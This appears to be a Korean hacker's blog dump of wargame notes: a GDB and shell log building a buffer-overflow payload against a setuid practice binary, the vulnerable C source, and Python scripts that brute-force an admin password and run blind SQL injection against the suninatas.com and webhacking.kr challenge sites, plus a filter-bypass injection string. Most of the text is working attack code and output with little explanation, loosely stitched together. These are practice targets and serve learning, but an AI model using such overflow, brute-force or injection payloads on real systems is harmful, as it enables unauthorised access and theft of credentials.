BinaryU

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')

[Inferior 1 (process 3428) exited normally]

(gdb) i reg

The program has no registers now.

(gdb)

The program has no registers now.

(gdb)

The program has no registers now.

(gdb)

The program has no registers now.

(gdb) quit

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ ls -al

total 20

drwxr-xr-x 2 root                   root                   4096 Apr  7 15:41 .

drwxr-xr-x 6 root                   root                   4096 Apr  8 02:11 ..

-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof        7569 Apr  7 15:40 do_you_know_bof

-r--r----- 1 root                   do_you_know_bof_solved   14 Apr  7 15:41 flag

do_you_know_bof@war02:~$ ls -l

total 12

-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof        7569 Apr  7 15:40 do_you_know_bof

-r--r----- 1 root                   do_you_know_bof_solved   14 Apr  7 15:41 flag

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ cp do_you_know_bof do_you_know_bof

cp: 'do_you_know_bof' and 'do_you_know_bof' are the same file

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ gdb ./do_you_know_bof

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Breakpoint 1, 0x08048570 in bof ()

(gdb) i reg

eax            0x11     17

ecx            0xf778d000       -143077376

edx            0xf7782898       -143120232

ebx            0xf7781000       -143126528

esp            0xff86464c       0xff86464c

ebp            0xff864600       0xff864600

esi            0x0      0

edi            0x0      0

eip            0x8048570        0x8048570 <bof+43>

eflags         0x282    [ SF IF ]

cs             0x23     35

ss             0x2b     43

ds             0x2b     43

es             0x2b     43

fs             0x0      0

gs             0x63     99

(gdb) x/32x %ebp

A syntax error in expression, near `%ebp'.

(gdb) x/32x $ebp

0xff864600:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864610:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864620:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864630:     0x41414141      0x41414141      0x41414141      0x41414141

0xff864640:     0x41414141      0x0804850d      0xff864600      0x08048600

0xff864650:     0xff864ceb      0xff864660      0x0000000f      0xf760a42d

0xff864660:     0x795f6f64      0x6b5f756f      0x5f776f6e      0x00666f62

0xff864670:     0x08048610      0x00000000      0x00000000      0xf75f0a83

(gdb) x/x $esp

0xff86464c:     0x08048600

(gdb) quit

A debugging session is active.

        Inferior 1 [process 3500] will be killed.

Quit anyway? (y or n) y

do_you_know_bof@war02:~$ gdb

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word".

(gdb)

(gdb) quit

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ gdb ./do_you_know_bof

GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1

Copyright (C) 2014 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "x86_64-linux-gnu".

Type "show configuration" for configuration details.

For bug reporting instructions, please see:

<http://www.gnu.org/software/gdb/bugs/>.

Find the GDB manual and other documentation resources online at:

<http://www.gnu.org/software/gdb/documentation/>.

For help, type "help".

Type "apropos word" to search for commands related to "word"...

Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.

(gdb) b *bof=43

Invalid cast.

(gdb) b *bof+43

Breakpoint 1 at 0x8048570

(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Breakpoint 1, 0x08048570 in bof ()

(gdb) i reg

eax            0x11     17

ecx            0xf77bc000       -142884864

edx            0xf77b1898       -142927720

ebx            0xf77b0000       -142934016

esp            0xffff0b9c       0xffff0b9c

ebp            0xffff0b00       0xffff0b00

esi            0x0      0

edi            0x0      0

eip            0x8048570        0x8048570 <bof+43>

eflags         0x286    [ PF SF IF ]

cs             0x23     35

ss             0x2b     43

ds             0x2b     43

es             0x2b     43

fs             0x0      0

gs             0x63     99

(gdb) disas $eip

Dump of assembler code for function bof:

   0x08048545 <+0>:     push   %ebp

   0x08048546 <+1>:     mov    %esp,%ebp

   0x08048548 <+3>:     sub    $0x118,%esp

   0x0804854e <+9>:     mov    0x8(%ebp),%eax

   0x08048551 <+12>:    mov    %eax,0x4(%esp)

   0x08048555 <+16>:    lea    -0x108(%ebp),%eax

   0x0804855b <+22>:    mov    %eax,(%esp)

   0x0804855e <+25>:    call   0x8048390 <strcpy@plt>

   0x08048563 <+30>:    movl   $0x80486c1,(%esp)

   0x0804856a <+37>:    call   0x80483a0 <puts@plt>

   0x0804856f <+42>:    leave

=> 0x08048570 <+43>:    ret

End of assembler dump.

(gdb) x/32x $ebp

0xffff0b00:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b10:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b20:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b30:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b40:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b50:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b60:     0x41414141      0x41414141      0x41414141      0x41414141

0xffff0b70:     0x41414141      0x41414141      0x41414141      0x41414141

(gdb) x/32x $esp

0xffff0b9c:     0x08048600      0xffff2ceb      0xffff0bb0      0x0000000f

0xffff0bac:     0xf763942d      0x795f6f64      0x6b5f756f      0x5f776f6e

0xffff0bbc:     0x00666f62      0x08048610      0x00000000      0x00000000

0xffff0bcc:     0xf761fa83      0x00000002      0xffff0c64      0xffff0c70

0xffff0bdc:     0xf77cecea      0x00000002      0xffff0c64      0xffff0c04

0xffff0bec:     0x0804a020      0x0804826c      0xf77b0000      0x00000000

0xffff0bfc:     0x00000000      0x00000000      0x5cf357f1      0x611073e0

0xffff0c0c:     0x00000000      0x00000000      0x00000000      0x00000002

(gdb) x/32x $esp-0x10

0xffff0b8c:     0x41414141      0x41414141      0x0804850d      0xffff0b00

0xffff0b9c:     0x08048600      0xffff2ceb      0xffff0bb0      0x0000000f

0xffff0bac:     0xf763942d      0x795f6f64      0x6b5f756f      0x5f776f6e

0xffff0bbc:     0x00666f62      0x08048610      0x00000000      0x00000000

0xffff0bcc:     0xf761fa83      0x00000002      0xffff0c64      0xffff0c70

0xffff0bdc:     0xf77cecea      0x00000002      0xffff0c64      0xffff0c04

0xffff0bec:     0x0804a020      0x0804826c      0xf77b0000      0x00000000

0xffff0bfc:     0x00000000      0x00000000      0x5cf357f1      0x611073e0

(gdb) quit

A debugging session is active.

        Inferior 1 [process 3565] will be killed.

Quit anyway? (y or n) y

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$

do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"x0d850408";'`

do you know bof?

do you know bof?

Segmentation fault

do_you_know_bof@war02:~$ ^C

do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

do you know bof?

do you know bof?

Its_show_time

do_you_know_bof@war02:~$

#include <unistd.h>

#include <stdio.h>

#include <stdlib.h>

#include <string.h>

void goingflag(){

   execl("/bin/cat", "/bin/cat", "/home/prob/flag", 0);

   printf("Good :)\n");

}

void bof(char *str){

   char buf[256];

   strcpy(buf, str);

   printf("do you know bof?\n");

}

int main(int argc, char *argv[]){

   char cmp[]="do_you_know_bof";

   if(argc != 2){

      exit(0);

   }

   if(strncmp(argv[1], cmp, strlen(cmp)) != 0){

      exit(0);

   }

   printf("do you know bof?\n");

   bof(argv[1]);

}

256-15+4=245 + dummy8 = 253

./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`

./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')

import urllib

import httplib

import urllib2

import re

def Search():

#print BlindList[blind]

print "========== Suninatas Brute Forcing!!! ==========\n"

for number in range(0,10000):

Attack = "suninatas.com"

conn = httplib.HTTPConnection(Attack)

post_param = urllib.urlencode({'id':'admin','pw':number})

headers = {'Cookie':"ASPSESSIONIDQSQAABST=HNFFFDAAMADPLEOAHBLGNFIG; auth%5Fkey=%3F%3F%3F%3F%3F"}

conn.request('POST','/Part_one/web08/web08.asp',post_param, headers)

response = conn.getresponse()

ok = re.findall("Incorrect!",response.read())

#print read

if ok:

f = open('su7_v1.txt','a')

f.write("Password Search!! ->"+str(number)+"\n")

print "Password search!! -> %d"%(number)

f.close()

else:

f = open('su7_v1.txt','a')

f.write("\n\n\nPassword Crack!! ->"+str(number)+"\n\n\n")

print "\n#######Password Crack!!####### -> %d\n"%number

f.close()

Search()

http://suninatas.com

2012년 4월 1일 15문제로 오픈했으며, 현재는 총 25문제를 제공하고 있다.

웹해킹, 시스템, 네트워크, 포렌식, 암호학, 리버싱 등 다양한 분야로 알차게 구성되어 있다.

전반적으로 초중급의 난이도를 보이므로, 해킹 입문 초보자들이 전반적인 분야의 지식을 쌓을 수 있다.

import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/challenge/bonus/bonus-1/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password="4348414c4c454e47453535434c6561727e7e4b4b"

for j in range(21, 50):
   for i in range(32,127):
      ii=hex(i)
      iii=ii[2:4]
      print ii
      if i < 99999 or i > 96:
          url1="http://webhacking.kr/challenge/web/web-31/rank.php?score=0 and ip=0x6c6f63616c686f7374 and left(pAsSw0RdzzzZ,%d)=0x" %j
          url2="%s" %password
          url3=url1+url2+"%s" %iii
          print url3
          req=urllib2.Request(url3)
          req.add_header('Cookie',"notice=yes; PHPSESSID=0be9e96926e7403cbc78d8b72499be3d")
          read=urllib2.urlopen(req).read()
          ok = re.findall("localhost",read)
          if ok:
              password=password+"%s" %iii
              print password
              break

import urllib,urllib2,ClientCookie

params = urllib.urlencode({'id':"ID",
                           'pw':"PW"})

request = urllib2.Request("http://webhacking.kr/index.html", params)
response = ClientCookie.urlopen(request)
data = response.read()

pos = data.find("<!-- http://webhacking.kr/blog.php -->")

ch = ['/', '.', '0', '2', 'a', 'c', 'e', 'f', 'g', 'h', 'l', 'p', 'r', 't', 'w']

#0 2 a c e f g h l p r t w

answer = "w"

#<a href=?read=admin>readme

if pos > 0:
    print "Login Failed"
else:
    print "Login Success"
    for k in range(0, 32):
        for i in range(0, 14):
            paramsProblem = urllib.urlencode({'search':answer+ch[i]})
            print answer+ch[i]
            requestProblem = urllib2.Request("http://webhacking.kr/challenge/web/web-33/index.php", paramsProblem)
            responseProblem = ClientCookie.urlopen(requestProblem)
            dataProblem = responseProblem.read()
            posProblem = dataProblem.find("read=admin")
            if posProblem > 0:
                print ch[i]
                answer += ch[i]
                break
            else:
                print "trying : ", ch[i]
print answer

첨부파일을 C:\Python27\Lib\site-packages에 풀어 넣는다.

clientcookie.zip

no=-1||id%09like%090x6125%26%26pw%09like%090x6625&id=a&pw=a